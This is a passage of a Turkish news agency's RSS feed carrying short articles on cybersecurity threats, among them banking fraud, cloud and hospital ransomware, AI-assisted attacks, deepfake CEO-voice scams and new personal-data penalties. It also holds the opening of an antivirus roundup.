<p data-start="1660" data-end="2121" class=""><strong data-start="1660" data-end="1718">Enformasyon güvenliği kamu düzeniyle doğrudan ilişkili</strong><br data-start="1718" data-end="1721">Konuşmasında enformasyon güvenliğinin önemine de değinen Yerlikaya, bu alanın yalnızca teknik bir konu olmadığını, kamu düzeni, toplumsal huzur ve milli güvenlik açısından stratejik bir alan olduğunu ifade etti. 'Yanlış bilgiyle yönlendirilen bir toplum doğru karar alma yeteneğini kaybeder' diyen Yerlikaya, dezenformasyonla mücadeleyi asayiş ve terörle mücadele kadar önemli gördüklerini vurguladı.</p>
<p data-start="2123" data-end="2488" class=""><strong data-start="2123" data-end="2176">İletişim Başkanlığı'nın çalışmaları destekleniyor</strong><br data-start="2176" data-end="2179">Yerlikaya, çalıştayda İletişim Başkanlığı’nın yürüttüğü faaliyetlerin önemine değinerek, devletle millet arasındaki bağın güçlendirilmesi adına yapılan iletişim çalışmalarını desteklediklerini belirtti. İletişim Başkanlığı koordinasyonunda yürütülecek tüm faaliyetlerde iş birliğine hazır olduklarını aktardı.</p>
<p data-start="2490" data-end="2736" class=""><strong data-start="2490" data-end="2502"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dijital bankalar kuşatma altında: Bankacılık sektöründe siber saldırı tehlikesi büyüyor</title>
            <link>https://cumha.com.tr/dijital-bankalar-kusatma-altinda-bankacilik-sektoerunde-siber-saldiri-tehlikesi-buyuyor</link>
            <guid>https://cumha.com.tr/dijital-bankalar-kusatma-altinda-bankacilik-sektoerunde-siber-saldiri-tehlikesi-buyuyor</guid>
            <description><![CDATA[ Mobil uygulamalar ve çevrimiçi bankacılığın yaygınlaşmasıyla, bankalar siber suçluların en çok hedef aldığı sektörlerin başında geliyor. Uzmanlar, dolandırıcılık yöntemlerinin çeşitlendiğini ve kullanıcı güvenliğinin ancak bilinçlendirme ve altyapı yatırımlarıyla sağlanabileceğini ifade ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b0a637aacd.webp" length="74288" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 10:23:37 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Dijital bankacılıkta siber saldırılar neden artıyor, kullanıcılar nasıl korunmalı, bankalar hangi teknolojik önlemleri alıyor, yasal düzenlemeler bu alanda ne sağlıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="438" data-end="817" class=""><strong data-start="438" data-end="491">Bankacılıkta dijitalleşme hızlandı, riskler arttı</strong><br data-start="491" data-end="494">Türkiye’de dijital bankacılık çözümlerinin hızla yaygınlaşması, finansal işlemlerde kolaylık sağlasa da beraberinde ciddi güvenlik risklerini getirdi. Özellikle mobil bankacılık uygulamaları üzerinden gerçekleştirilen işlemler, kötü amaçlı yazılımlar, sahte uygulamalar ve sosyal mühendislik saldırılarıyla hedef alınmakta.</p>
<p data-start="819" data-end="1265" class=""><strong data-start="819" data-end="878">Fidye yazılımları ve dolandırıcılık girişimleri artıyor</strong><br data-start="878" data-end="881">Siber saldırganlar, bankaların sistemlerine doğrudan sızmaktan ziyade kullanıcıları hedef alan yöntemleri tercih ediyor. Kimlik avı e-postaları, sahte müşteri hizmetleri aramaları ve deepfake videolarla desteklenen sahte talepler, bireysel kullanıcıları finansal kayba uğratıyor. Bazı saldırganlar ise mobil bankacılık uygulamalarını taklit ederek kullanıcı bilgilerini ele geçiriyor.</p>
<p data-start="1267" data-end="1684" class=""><strong data-start="1267" data-end="1313">Uzmanlar altyapı ve eğitim vurgusu yapıyor</strong><br data-start="1313" data-end="1316">Finans teknolojileri alanında çalışan güvenlik uzmanları, bankaların sadece yazılımsal değil, kullanıcı eğitimi ve farkındalık artırma konusunda da yatırım yapması gerektiğini belirtiyor. Çok faktörlü kimlik doğrulama, cihaz bazlı oturum kontrolü ve olağandışı işlem tespiti gibi önlemler yaygınlaştırılıyor. Ancak kullanıcı hataları bu önlemleri işlevsiz kılabiliyor.</p>
<p data-start="1686" data-end="2072" class=""><strong data-start="1686" data-end="1728">Yasal çerçeve ve regülasyonlar devrede</strong><br data-start="1728" data-end="1731">Türkiye’de Bankacılık Düzenleme ve Denetleme Kurumu (BDDK) ile Bilgi Teknolojileri ve İletişim Kurumu (BTK), bankacılık sektöründe siber güvenlik standartlarını artırmak için çeşitli düzenlemeler yapıyor. Aynı zamanda, bankaların anlık olay müdahale merkezleri kurmaları ve düzenli sızma testleri gerçekleştirmeleri zorunlu hale getiriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Metaverse evreninde güvenlik boşluğu: Sanal dünyada kişisel veriler tehlikede</title>
            <link>https://cumha.com.tr/metaverse-evreninde-guvenlik-boslugu-sanal-dunyada-kisisel-veriler-tehlikede</link>
            <guid>https://cumha.com.tr/metaverse-evreninde-guvenlik-boslugu-sanal-dunyada-kisisel-veriler-tehlikede</guid>
            <description><![CDATA[ Metaverse platformlarının yaygınlaşmasıyla, sanal ortamlarda dijital kimlik ve finansal verilerin güvenliği büyük bir sorun haline geldi. Uzmanlar, bu yeni dijital evrende siber güvenlik protokollerinin acilen geliştirilmesi gerektiğini ve kullanıcıların daha fazla bilinçlendirilmesi gerektiğini vurguluyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b0a2c7b7c9.webp" length="22394" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 10:22:29 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Metaverse&#039;te hangi siber riskler öne çıkıyor, sanal kimlikler nasıl korunmalı, kullanıcılar dolandırıcılıklara karşı ne yapmalı, Türkiye bu alandaki yasal boşlukları nasıl kapatmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="441" data-end="879" class=""><strong data-start="441" data-end="496">Sanal dünya büyüyor, riskler de beraberinde geliyor</strong><br data-start="496" data-end="499">Metaverse teknolojisi, kullanıcıların artırılmış ve sanal gerçeklik ortamlarında etkileşim kurabildiği yeni bir dijital evren olarak öne çıkıyor. Ancak bu sanal dünyada gerçekleşen ekonomik ve sosyal faaliyetler, siber saldırganlar için cazip hedefler oluşturuyor. Kullanıcıların avatarları, dijital cüzdanları ve kişisel verileri, dolandırıcılık vakalarında sıkça hedef alınıyor.</p>
<p data-start="881" data-end="1287" class=""><strong data-start="881" data-end="934">Kimlik hırsızlığı ve sanal dolandırıcılık artıyor</strong><br data-start="934" data-end="937">Metaverse içinde kullanılan kimlik doğrulama sistemleri çoğu zaman yetersiz kalıyor. Bu da saldırganların sahte kimliklerle giriş yapmasını ve diğer kullanıcıları aldatmasını kolaylaştırıyor. Özellikle NFT ve dijital varlık ticaretinin yapıldığı platformlarda, sahte linkler ve kimlik avı saldırıları ile kullanıcıların hesapları ele geçirilebiliyor.</p>
<p data-start="1289" data-end="1756" class=""><strong data-start="1289" data-end="1339">Yeni dünya, yeni güvenlik protokolleri istiyor</strong><br data-start="1339" data-end="1342">Siber güvenlik uzmanları, Metaverse platformlarının merkeziyetsiz yapıları nedeniyle klasik güvenlik protokollerinin yeterli olmadığını belirtiyor. Gerçek zamanlı izleme, biyometrik kimlik doğrulama ve kullanıcı davranış analizine dayalı güvenlik çözümlerinin geliştirilmesi gerektiği ifade ediliyor. Ayrıca kullanıcıların kişisel verilerini paylaşmadan önce güvenlik politikalarını dikkatle incelemesi öneriliyor.</p>
<p data-start="1758" data-end="2077" class=""><strong data-start="1758" data-end="1792">Yasal boşluklar dikkat çekiyor</strong><br data-start="1792" data-end="1795">Türkiye’de Metaverse platformları henüz açık yasal çerçevelerle düzenlenmiş değil. Uzmanlar, bu durumun dolandırıcılık ve veri ihlallerinde mağduriyet yarattığını belirtiyor. Küresel düzeyde de benzer sorunlar yaşanıyor ve birçok ülke bu alanda yeni düzenlemeler üzerinde çalışıyor.</p>
<p data-start="2079" data-end="2273" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Şirket verileri tehlikede: Bulut bilişimde artan siber güvenlik riskleri dikkat çekiyor</title>
            <link>https://cumha.com.tr/sirket-verileri-tehlikede-bulut-bilisimde-artan-siber-guvenlik-riskleri-dikkat-cekiyor</link>
            <guid>https://cumha.com.tr/sirket-verileri-tehlikede-bulut-bilisimde-artan-siber-guvenlik-riskleri-dikkat-cekiyor</guid>
            <description><![CDATA[ Kurumsal verilerin bulut sistemlerine taşınmasıyla birlikte, siber saldırganlar bu altyapılara yoğunlaşmaya başladı. Uzmanlar, şirketlerin veri ihlallerini önlemek için güçlü şifreleme, erişim kontrolü ve güvenlik denetimlerine odaklanması gerektiğini vurguluyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b09d289938.webp" length="17022" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 10:20:57 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Bulut bilişimde siber saldırılar neden artıyor, şirketler hangi güvenlik önlemlerini almalı, bulut sistemlerinin zayıf noktaları nelerdir, yasal düzenlemelere uyum nasıl sağlanmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="507" data-end="890" class=""><strong data-start="507" data-end="559">Bulut sistemlere geçiş hızlandı, tehditler arttı</strong><br data-start="559" data-end="562">Şirketlerin dijitalleşme sürecinde bulut teknolojilerine yönelmesi, verimlilik ve maliyet avantajı sağlarken aynı zamanda yeni güvenlik risklerini de beraberinde getiriyor. Özellikle pandemi sonrası hibrit ve uzaktan çalışma sistemlerinin yaygınlaşması, kurumsal verilerin büyük ölçekte bulut ortamlarına taşınmasına neden oldu.</p>
<p data-start="892" data-end="1257" class=""><strong data-start="892" data-end="940">Saldırganların yeni hedefi: Bulut altyapılar</strong><br data-start="940" data-end="943">Siber saldırganlar, özellikle zayıf yapılandırılmış bulut sistemlerini hedef alıyor. Yanlış erişim izinleri, yetersiz şifreleme ve denetlenmeyen API bağlantıları, siber saldırılar için açık kapılar oluşturuyor. Bazı durumlarda kullanıcı hataları veya insan kaynaklı ihlaller de veri sızıntılarına neden olabiliyor.</p>
<p data-start="1259" data-end="1752" class=""><strong data-start="1259" data-end="1291">Uzmanlardan şirketlere uyarı</strong><br data-start="1291" data-end="1294">Siber güvenlik uzmanları, bulut sistemlerinin doğası gereği merkezi bir yapıda olduğu için, yaşanacak bir güvenlik ihlalinin tüm verileri etkileyebileceğini belirtiyor. Bu nedenle şirketlerin öncelikle güçlü şifreleme politikaları uygulaması, kullanıcı erişim izinlerini sınırlaması ve düzenli denetimler gerçekleştirmesi öneriliyor. Ayrıca çok faktörlü kimlik doğrulama ve güvenlik açıklarını erken tespit eden yazılımların kullanılması kritik önem taşıyor.</p>
<p data-start="1754" data-end="2105" class=""><strong data-start="1754" data-end="1796">Yasal düzenlemelere de dikkat edilmeli</strong><br data-start="1796" data-end="1799">Uzmanlar, veri işleyen şirketlerin yalnızca teknik önlemlerle yetinmemesi, aynı zamanda KVKK ve benzeri veri koruma yasalarına tam uyum sağlaması gerektiğini ifade ediyor. Aksi takdirde yalnızca siber saldırılarla değil, yüksek para cezaları ve itibar kaybıyla da karşı karşıya kalınabileceği belirtiliyor.</p>
<p data-start="2107" data-end="2300" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Hastaneler hedefte: Sağlık sektörüne yönelik siber saldırılar alarm veriyor</title>
            <link>https://cumha.com.tr/hastaneler-hedefte-saglik-sektoerune-yoenelik-siber-saldirilar-alarm-veriyor</link>
            <guid>https://cumha.com.tr/hastaneler-hedefte-saglik-sektoerune-yoenelik-siber-saldirilar-alarm-veriyor</guid>
            <description><![CDATA[ Türkiye’de sağlık kuruluşlarını hedef alan siber saldırılar hızla artıyor. Hasta verilerine ulaşmak için hastane sistemlerine sızan saldırganlar, fidye talepleriyle sistemleri kilitliyor. Uzmanlar, dijital sağlık altyapısının acilen güçlendirilmesi gerektiğini belirtiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b099638730.webp" length="24938" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 10:20:33 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Sağlık kurumlarına yönelik siber saldırılar neden artıyor, hasta verileri nasıl hedef alınıyor, hastaneler siber tehditlere karşı nasıl korunmalı, Türkiye sağlık sektöründe ne gibi adımlar atmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="486" data-end="906" class=""><strong data-start="486" data-end="538">Sağlık sektörü dijitalleşirken tehditler büyüyor</strong><br data-start="538" data-end="541">Sağlık hizmetlerinin dijital ortamlarda sunulması, hastane sistemlerinin internet bağlantılı altyapılarla çalışması ve milyonlarca hastaya ait kişisel verinin elektronik ortamda saklanması, sağlık sektörünü siber saldırıların hedefi haline getirdi. Türkiye’de son yıllarda birçok büyük hastane, fidye yazılımları ve veri sızdırma saldırılarıyla karşı karşıya kaldı.</p>
<p data-start="908" data-end="1256" class=""><strong data-start="908" data-end="953">Fidye yazılımlarla sistemler kilitleniyor</strong><br data-start="953" data-end="956">Saldırganlar, özellikle hasta bilgilerini, tıbbi kayıtları ve sistem yönetim panellerini şifreleyerek erişilemez hale getiriyor. Ardından hastane yönetimlerinden fidye talebinde bulunuyorlar. Bazı durumlarda yedekleme sistemlerine de zarar verildiği için kurumlar verilerine tamamen erişemeyebiliyor.</p>
<p data-start="1258" data-end="1569" class=""><strong data-start="1258" data-end="1313">Hasta güvenliği ve hizmet sürekliliği riske giriyor</strong><br data-start="1313" data-end="1316">Bu tür saldırılar yalnızca veri güvenliğini değil, aynı zamanda hizmet sürekliliğini de tehdit ediyor. Uzmanlar, ameliyat programlarının, ilaç dozlarının ve acil müdahale sistemlerinin çökmesinin hasta güvenliğini doğrudan etkileyebileceğini vurguluyor.</p>
<p data-start="1571" data-end="2051" class=""><strong data-start="1571" data-end="1615">Sağlık bilişim altyapısı güçlendirilmeli</strong><br data-start="1615" data-end="1618">Uzmanlara göre, Türkiye’deki sağlık kurumlarının büyük kısmı siber güvenlik açısından yetersiz korumaya sahip. Acil olarak merkezi güvenlik denetim sistemleri kurulması, hastane personeline siber güvenlik eğitimi verilmesi ve yüksek standartlarda yedekleme çözümlerinin hayata geçirilmesi gerektiği ifade ediliyor. Ayrıca bu saldırılara karşı kurumlar arası bilgi paylaşımı ve erken uyarı sistemlerinin yaygınlaştırılması öneriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yapay zekayla şekillenen siber saldırılar, klasik güvenlik sistemlerini çaresiz bırakıyor</title>
            <link>https://cumha.com.tr/yapay-zekayla-sekillenen-siber-saldirilar-klasik-guvenlik-sistemlerini-caresiz-birakiyor</link>
            <guid>https://cumha.com.tr/yapay-zekayla-sekillenen-siber-saldirilar-klasik-guvenlik-sistemlerini-caresiz-birakiyor</guid>
            <description><![CDATA[ Yapay zeka tabanlı saldırı tekniklerinin gelişmesiyle birlikte, geleneksel siber güvenlik sistemleri yetersiz kalıyor. Kurumlar savunma stratejilerini yeniden yapılandırırken, uzmanlar da yapay zeka destekli koruma çözümlerinin önemine dikkat çekiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b09663621f.webp" length="50804" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 10:19:10 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yapay zeka siber saldırılarda nasıl kullanılıyor, klasik güvenlik sistemleri neden yetersiz kalıyor, kurumlar savunma stratejilerini nasıl geliştirmeli, Türkiye bu alanda hangi adımları atıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="673" data-end="1051" class=""><strong data-start="673" data-end="731">Yapay zekanın siber tehditlerdeki rolü giderek artıyor</strong><br data-start="731" data-end="734">Son yıllarda yapay zeka (YZ) teknolojilerinin gelişimi, yalnızca savunma sistemleri değil, saldırı teknikleri açısından da büyük bir dönüşüm yaratıyor. Siber suçlular, gelişmiş YZ algoritmalarını kullanarak otomatik saldırılar gerçekleştirebiliyor, zayıf noktaları çok daha hızlı tespit ederek sistemlere sızabiliyor.</p>
<p data-start="1053" data-end="1499" class=""><strong data-start="1053" data-end="1094">Geleneksel sistemler yetersiz kalıyor</strong><br data-start="1094" data-end="1097">Uzmanlara göre klasik antivirüs programları ve güvenlik duvarları, YZ tabanlı saldırılara karşı etkisiz hale gelmiş durumda. Özellikle makine öğrenimi ile desteklenen zararlı yazılımlar, tespit edilmeden uzun süre sistemlerde kalabiliyor. Ayrıca sosyal mühendislik saldırılarında kullanılan YZ tabanlı sahte ses ve görüntü üretimi, kurumların dolandırıcılığa karşı savunmasız hale gelmesine yol açıyor.</p>
<p data-start="1501" data-end="1868" class=""><strong data-start="1501" data-end="1546">Savunma stratejileri yeniden şekilleniyor</strong><br data-start="1546" data-end="1549">Siber güvenlik uzmanları, kurumların yalnızca reaktif değil, proaktif savunma yöntemleri geliştirmesi gerektiğine işaret ediyor. Bunun için YZ destekli tehdit analiz sistemlerinin kurulması, anomali tespiti yapan algoritmaların entegre edilmesi ve saldırı simülasyonlarının düzenli olarak gerçekleştirilmesi öneriliyor.</p>
<p data-start="1870" data-end="2261" class=""><strong data-start="1870" data-end="1904">Türkiye’de farkındalık artıyor</strong><br data-start="1904" data-end="1907">Türkiye’de kamu ve özel sektör kuruluşlarının bu tehdide karşı farkındalığı son dönemde artarken, bazı kurumlar YZ destekli siber güvenlik çözümleri için yatırım yapmaya başladı. Ancak uzmanlara göre bu dönüşüm henüz yeterli seviyede değil. Eğitimli insan kaynağına olan ihtiyaç ve teknolojik altyapı eksiklikleri, kurumların direnç seviyesini düşürüyor.</p>
<p data-start="2263" data-end="2468" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber saldırıların yarıdan fazlası üretim ve finans sektörlerini hedef alıyor</title>
            <link>https://cumha.com.tr/siber-saldirilarin-yaridan-fazlasi-uretim-ve-finans-sektoerlerini-hedef-aliyor</link>
            <guid>https://cumha.com.tr/siber-saldirilarin-yaridan-fazlasi-uretim-ve-finans-sektoerlerini-hedef-aliyor</guid>
            <description><![CDATA[ IBM X-Force’un 2025 Tehdit İstihbaratı Endeksi’ne göre küresel siber saldırıların yüzde 56’sı imalat sanayi ile finans ve sigorta sektörlerini etkiliyor. Bu veriler, dijital altyapılara yönelik tehditlerin ekonomik işleyişin belkemiğini oluşturan alanlara yoğunlaştığını ortaya koyuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814a47b5e308.webp" length="38676" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 18:33:42 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Siber saldırıların en çok hedef aldığı sektörler hangileri, imalat sanayisi neden hedefte, finans sektörü siber tehditlere karşı ne durumda, 2025 IBM X-Force raporuna göre saldırı yüzdeleri ne</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="408" data-end="411"><strong data-start="411" data-end="469">Saldırıların çoğu kritik ekonomik sektörlere yöneliyor</strong><br data-start="469" data-end="472">IBM X-Force tarafından yayımlanan 2025 Tehdit İstihbaratı Endeksi, siber saldırıların en çok hangi alanları etkilediğini gözler önüne serdi. Rapora göre, 2024 yılı boyunca küresel ölçekte kayda geçen saldırıların yüzde 40’ı imalat sanayisini, yüzde 16’sı ise finans ve sigorta kuruluşlarını hedef aldı.</p>
<p></p>
<p data-start="778" data-end="1069" class=""><strong data-start="778" data-end="826">Üretim ve finans altyapıları başlıca hedefte</strong><br data-start="826" data-end="829">Endekste yer alan verilere göre, saldırıların yarıdan fazlası doğrudan üretim hatları ve para akışını sağlayan sistemleri sekteye uğratmaya yönelik. Bu durum, hem tedarik zincirlerinde hem de ekonomik güvenlikte ciddi riskler oluşturuyor.</p>
<p data-start="1071" data-end="1476" class=""><strong data-start="1071" data-end="1122">Siber tehditler stratejik alanlara yoğunlaşıyor</strong><br data-start="1122" data-end="1125">Uzmanlara göre, bu saldırıların odağında yalnızca maddi kazanç değil, aynı zamanda operasyonel aksaklık yaratmak da bulunuyor. Özellikle üretim sistemlerinin durması, şirketlere milyonlarca dolarlık kayıplar yaşatabiliyor. Finans ve sigorta altyapılarına yönelik saldırılar ise kullanıcı verilerinin çalınması ve dolandırıcılık risklerini artırıyor.</p>
<p data-start="1478" data-end="1685" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Deepfake dolandırıcılığı küresel çapta 10 milyar doları aştı: CEO sesleriyle büyük vurgun</title>
            <link>https://cumha.com.tr/deepfake-dolandiriciligi-kuresel-capta-10-milyar-dolari-asti-ceo-sesleriyle-buyuk-vurgun</link>
            <guid>https://cumha.com.tr/deepfake-dolandiriciligi-kuresel-capta-10-milyar-dolari-asti-ceo-sesleriyle-buyuk-vurgun</guid>
            <description><![CDATA[ McAfee ve Dünya Ekonomik Forumu’nun 2024 verilerine göre, deepfake teknolojisiyle gerçekleştirilen dolandırıcılıklar 2025 itibarıyla dünya genelinde 10 milyar dolardan fazla zarara yol açtı. Özellikle finans, sigorta ve kamu sektörlerinde ciddi kayıplar yaşanırken, Türkiye’de de benzer yöntemlerle şirketler hedef alınmaya başladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814a6244c9dc.webp" length="16844" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 18:27:45 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Deepfake dolandırıcılığının küresel maliyeti ne kadar oldu, en çok hangi sektörler etkilendi, Türkiye’de bu yöntemle dolandırılan şirketler var mı, uzmanlar ne gibi önlemler öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="474" data-end="477"><strong data-start="477" data-end="532">Deepfake saldırılarının yıllık maliyeti rekor kırdı</strong><br data-start="532" data-end="535">Dünya Ekonomik Forumu ve McAfee’nin yayımladığı son raporlara göre, 2025 itibarıyla deepfake dolandırıcılıklarının küresel maliyeti 10 milyar doları geçti. Yapay zekâ teknolojileriyle üretilen sahte ses ve görüntüler, dolandırıcılar tarafından şirket içi güvenlik açıklarını hedef almak için kullanılıyor.</p>
<p></p>
<p data-start="842" data-end="1260" class=""><strong data-start="842" data-end="910">CEO’ların sesi taklit edilerek para transferi talimatı veriliyor</strong><br data-start="910" data-end="913">Rapora göre en yaygın yöntemlerden biri, şirket CEO’larının seslerinin yapay zekâ ile taklit edilmesiyle çalışanlara sahte para transferi emirleri verilmesi. Bu tür vakalar özellikle finans, sigorta ve büyük ölçekli kamu kuruluşlarında ciddi maddi kayıplara yol açtı. Şirket içi güven zincirinin bu yolla kırılması, saldırıların etkisini katlıyor.</p>
<p data-start="1262" data-end="1570" class=""><strong data-start="1262" data-end="1302">Türkiye’de de şirketler hedef alındı</strong><br data-start="1302" data-end="1305">Deepfake dolandırıcılığı Türkiye’de de etkisini gösterdi. Yerli şirketlerin bazıları, sahte ses kayıtlarıyla yönlendirilen çalışanlar aracılığıyla yüz binlerce liralık transferler yaptı. Olaylar genellikle iç yazışmalar ve sesli görüşmeler yoluyla gerçekleştirildi.</p>
<p data-start="1572" data-end="1934" class=""><strong data-start="1572" data-end="1605">Uzmanlardan doğrulama çağrısı</strong><br data-start="1605" data-end="1608">Siber güvenlik uzmanları, sesli veya görüntülü gelen talimatların her zaman ikinci bir iletişim kanalıyla doğrulanması gerektiği konusunda uyarıda bulunuyor. Ayrıca şirketlerin, yapay zekâ destekli sahte içerik tespit sistemlerine yatırım yapmasının, bu tür saldırıların önüne geçilmesi için kritik önemde olduğu belirtiliyor.</p>
<p data-start="1936" data-end="2135" class=""><strong data-start="1936" data-end="1948"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kişisel veriyi izinsiz paylaşanlara 2 milyon TL’ye kadar ceza yolda: Kamu kurumları da kapsama alındı</title>
            <link>https://cumha.com.tr/kisisel-veriyi-izinsiz-paylasanlara-2-milyon-tlye-kadar-ceza-yolda-kamu-kurumlari-da-kapsama-alindi</link>
            <guid>https://cumha.com.tr/kisisel-veriyi-izinsiz-paylasanlara-2-milyon-tlye-kadar-ceza-yolda-kamu-kurumlari-da-kapsama-alindi</guid>
            <description><![CDATA[ Kişisel verilerin korunmasına ilişkin yaptırımlar genişletildi. Artık kamu kurumları da idari yaptırımlarla karşılaşabilecek. Rızasız paylaşımda 500 bin TL’ye, veri güvenliği ihlalinde ise 2 milyon TL’ye kadar para cezası uygulanabilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814a65dbbae2.webp" length="17672" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 17:11:44 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Veri güvenliği ihlalinde ne kadar ceza uygulanıyor, veriler izinsiz yurt dışına aktarılırsa ne oluyor, kamu kurumları bu yaptırımların neresinde, kişisel veri ihlallerinde mahkemeye nasıl başvuruluyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="384" data-end="387"><strong data-start="387" data-end="457">Kişisel verileri rızasız paylaşanlara ağır yaptırımlar uygulanacak</strong><br data-start="457" data-end="460">Yeni düzenlemeyle birlikte, kişisel verileri veri sahibinin izni olmadan paylaşan kurumlara 500 bin TL’ye kadar idari para cezası kesilebilecek.</p>
<p></p>
<p data-start="608" data-end="883" class=""><strong data-start="608" data-end="664">Veri güvenliği ihlallerine 2 milyon TL’ye kadar ceza</strong><br data-start="664" data-end="667">Veri güvenliği yükümlülüklerini yerine getirmeyen veri sorumluları, 2 milyon TL’ye kadar para cezasına çarptırılabilecek. Bu kapsamda yalnızca özel sektör değil, kamu kurumları da denetime ve yaptırıma tabi olacak.</p>
<p data-start="885" data-end="1182" class=""><strong data-start="885" data-end="952">Yurt dışına izinsiz veri aktarımına faaliyet durdurma yaptırımı</strong><br data-start="952" data-end="955">Verilerin yurt dışına gerekli izinler olmaksızın aktarılması durumunda, veri sorumlusunun faaliyetleri durdurulabilecek. Bu yaptırım, kurumların uluslararası veri işlemlerinde daha dikkatli hareket etmelerini zorunlu kılıyor.</p>
<p data-start="1184" data-end="1452" class=""><strong data-start="1184" data-end="1222">Mahkemeye başvuru hakkı genişliyor</strong><br data-start="1222" data-end="1225">Kişisel verinin silinmesi ya da düzeltilmesi taleplerine yasal süre içinde yanıt verilmemesi durumunda, ilgili kişiler doğrudan mahkemeye başvurabilecek. Böylece vatandaşın veri hakları daha güçlü bir şekilde korunmuş olacak.</p>
<p data-start="1454" data-end="1747" class=""><strong data-start="1454" data-end="1504">Kamu kurumları da artık yaptırımlar kapsamında</strong><br data-start="1504" data-end="1507">Yeni düzenlemeyle birlikte kamu kurumları da kişisel verilerin korunmasına yönelik yükümlülüklerden muaf olmayacak. Böylece devlet kurumları da veri ihlallerinde para cezası, faaliyet durdurma ve yargı süreciyle karşı karşıya kalabilecek.</p>
<p data-start="1749" data-end="1964" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>2025’in En İyi Ücretli Antivirüs Programları Açıklandı: Güvenlik ve Performans Testlerinden Geçen 5 Seçenek</title>
            <link>https://cumha.com.tr/2025in-en-iyi-ucretli-antivirus-programlari-aciklandi-guvenlik-ve-performans-testlerinden-gecen-5-secenek</link>
            <guid>https://cumha.com.tr/2025in-en-iyi-ucretli-antivirus-programlari-aciklandi-guvenlik-ve-performans-testlerinden-gecen-5-secenek</guid>
            <description><![CDATA[ 2025 yılı itibarıyla hem bireysel kullanıcılar hem de işletmeler için önerilen en iyi ücretli antivirüs programları belli oldu. Sistem performansını düşürmeden yüksek koruma sağlayan bu yazılımlar, VPN, ebeveyn denetimi ve kimlik koruması gibi ek özellikleriyle dikkat çekiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681474ab1b1d1.webp" length="33918" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:31:00 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>2025 yılında en iyi ücretli antivirüs programı hangisi, antivirüs programlarının fiyatları ne kadar, hangi antivirüs programı hangi kullanıcıya uygun, antivirüs yazılımları hangi özellikleri sunuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="433" data-end="763" class=""><strong data-start="433" data-end="484">2025’in en iyi antivirüs programları listelendi</strong><br data-start="484" data-end="487">Siber güvenlik alanında yapılan testlere göre, 2025 yılında hem güvenlik hem de sistem performansı açısından öne çıkan beş ücretli antivirüs programı kullanıcılarla paylaşıldı. Listede yer alan ürünler, farklı kullanıcı profillerine hitap eden özellikleriyle dikkat çekiyor.</p>
